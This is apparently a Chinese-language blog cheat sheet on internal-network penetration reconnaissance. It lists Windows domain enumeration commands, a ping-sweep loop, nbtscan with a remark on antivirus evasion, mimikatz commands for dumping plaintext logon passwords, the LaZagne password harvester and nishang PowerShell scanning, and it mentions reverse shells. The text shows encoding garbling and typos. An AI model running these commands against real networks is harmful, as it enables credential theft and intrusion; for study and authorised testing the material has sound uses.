內(nèi)網(wǎng)滲透-信息收集

tasklist? 查看進(jìn)程列表

scktasks? ?查看計劃任務(wù)

網(wǎng)絡(luò)信息收集

ipconfig /all? 判斷是否存在域

net view /domain????判斷是否存在域

net time /domain? ? 判斷主域

netstat -ano? ? 當(dāng)前網(wǎng)絡(luò)端口開放情況

nslookup? ? ? 追蹤域IP地址

whoami? /all? ? 用戶權(quán)限

net localgroup? ? 本地用戶組

net user? ? 本地用戶

net user /domain????獲取域用戶信息

net group /domain? ? 獲取域用戶組信息

net group "Domain Admins" /domain? ? 查詢域管理員賬戶

net group "Enterprise Admins" /domain? ? 查詢域管理員用戶組

net group "Domain Controllers" /domain????查詢域控制器

Windows明文賬戶密碼獲取工具 mimikatz

https://github.com/gentilkiwi/mimikatz

簡單命令使用:

privilege::debug

sekurlsa::logonpasswords

計算機各種應(yīng)用協(xié)議口令獲取工具

lazagen

探針域控制器名及地址信息

net time /domain

nslookup ping

探針域內(nèi)存活主機及地址信息

nbtscan 192.168.3.0/24 第三方工具? ? ? ? //可能需要免殺? 可以看到哪個是DC 和其他信息

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL=" 自帶內(nèi)部命令 不需要免殺 只能看到存活主機


nmap masscan 第三方 PowerShell 腳本 nishang empire 等

#導(dǎo)入模塊 nishang

Import-Module .\nishang.psm1

#設(shè)置執(zhí)行策略

Set-ExecutionPolicy RemoteSigned

#獲取模塊 nishang 的命令函數(shù)

Get-Command -Module nishang

#獲取常規(guī)計算機信息

Get-Information

#端口掃描(查看目錄對應(yīng)文件有演示語法,其他同理)

Invoke-PortScan -StartAddress 192.168.3.0 -EndAddress 192.168.3.100 -ResolveHost -ScanPort

#其他功能:刪除補丁,反彈 Shell,憑據(jù)獲取等

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容